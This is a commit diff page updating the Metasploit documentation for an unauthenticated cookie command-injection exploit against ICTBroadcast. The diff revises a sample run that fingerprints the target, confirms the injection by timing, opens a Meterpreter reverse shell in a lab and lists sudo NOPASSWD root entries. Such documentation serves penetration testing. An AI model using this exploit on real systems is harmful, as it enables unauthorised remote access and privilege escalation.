Skip to content

Commit 7d744c2

Browse files
committed
Update documentation
1 parent 2c9053c commit 7d744c2

File tree

1 file changed

+9
-9
lines changed

1 file changed

+9
-9
lines changed

documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -111,16 +111,16 @@ exploit
111111
**Note**: The session cookie is retrieved dynamically and modified for command injection.
112112

113113
```bash
114-
msf6 exploit(linux/http/ictbroadcast_unauth_cookie) > run http://lab/
114+
msf6 exploit(linux/http/ictbroadcast_unauth_cookie) > run http://lab
115115
[*] Started reverse TCP handler on 192.168.1.36:4444
116116
[*] Running automatic check ("set AutoCheck false" to disable)
117-
[*] Checking if target is an ICTBroadcast instance…
118-
[+] ICTBroadcast detected, verifying injection…
119-
[*] Retrieving session cookies dynamically...
120-
[*] Found cookies: BROADCAST="16c4d0bf9d5b5cf9d8dc3f19e6ea2338;"
121-
[+] The target is vulnerable. Injection confirmed (slept 3s)
117+
[*] Checking ICTBroadcast via JS fingerprints
118+
[+] JS fingerprint found; performing timing tests
119+
[*] Retrieving session cookies dynamically
120+
[*] Found cookies: BROADCAST=49b067ae1fdfbcab3d73caa1c7e6d75a
121+
[+] The target is vulnerable. Injected RCE (slept 4s)
122122
[*] Sending stage (3090404 bytes) to 192.168.128.3
123-
[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.128.3:58784) at 2025-08-02 19:27:09 +0200
123+
[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.128.3:53178) at 2025-08-04 17:50:33 +0200
124124

125125
meterpreter > sysinfo
126126
Computer : 192.168.128.3
@@ -129,9 +129,8 @@ Architecture : x64
129129
BuildTuple : x86_64-linux-musl
130130
Meterpreter : x64/linux
131131
meterpreter > shell
132-
Process 798 created.
132+
Process 877 created.
133133
Channel 1 created.
134-
export TERM=xterm
135134
SHELL=/bin/bash script -q /dev/null
136135
bash-4.4$ sudo -l
137136
sudo -l
@@ -153,4 +152,5 @@ User asterisk may run the following commands on f7681361bd20:
153152
(root) NOPASSWD: /usr/sbin/ntpdate
154153
(root) NOPASSWD: /usr/sbin/rabbitmqctl
155154
(root) NOPASSWD: /bin/systemctl
155+
bash-4.4$
156156
```

0 commit comments

Comments
 (0)